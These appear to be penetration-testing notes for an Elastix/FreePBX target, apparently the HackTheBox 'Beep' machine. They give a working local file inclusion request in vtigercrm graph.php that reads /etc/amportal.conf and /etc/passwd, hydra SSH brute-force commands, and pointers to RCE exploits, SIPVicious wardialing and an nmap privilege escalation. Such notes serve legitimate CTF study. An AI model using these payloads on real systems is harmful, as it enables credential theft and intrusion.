Elastix FreePBX

Elastix LFI graph.php

• Elastix version: FreePBX 2.8.14

• google "elastix vulnerabilities"

• Elastix 2.2.0 graph.php Local File Inclusion (LFI)

• https://www.exploit-db.com/exploits/37637

• amportal.conf - Config file target will give up the Creds

• If you find user/pw - fire up hydra and crack it

searchsploit elastix
searchsploit -m 37637   ..copy LFI

https://$IP/vtigercrm/graph.php?current_language
=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
=../../../../../../../..//etc/passwd%00&module=Accounts&action

Ignore users with nologin
vim > :g/nologin/d

Fix formatting:
tr '#' '\n' < input.txt > output.txt
grep -i -E 'user|pass|host|name' output.txt

hydra -L users.txt -P pass.txt ssh://$IP

Passwords found here.. could be used as 'root' :)
(beep htb)

Elastix LFI vtigercrm

• vTiger CRM 5.1.0

• gobuster found 'vtigercrm' folder

• searchsploit vtiger found: Local File Inclusion - 18770.txt

PBX Extensions

• https://$IP/panel ..Target will show extensions (if you can access)

• SIPVicious: Find active 'extensions' by wardialing your PBX

• sudo apt install sipvicious

• https://github.com/EnableSecurity/sipvicious

• https://helpforhac.blogspot.com/2014/01/free-pbx-hack-phone.html

Remote Code Execution

• FreePBX 2.8.14

• searchsploit freepbx 2.8.14

• Found: 2.10.10 / Elastix 2.2.0 - Remote Code Execution: php/webapps: 18650.py

  • Did you read the notes?

  • Elastix often allows us to run nmap with interactive

Email php injection

• Requires:

  • smtp:25 open

  • user/pass of email account

  • LFI that can open/execute under same account

Metasploit

• Optional method: "vtiger soap upload"

• MSF SSL Issue/Fix: 6783

PBX Shellshock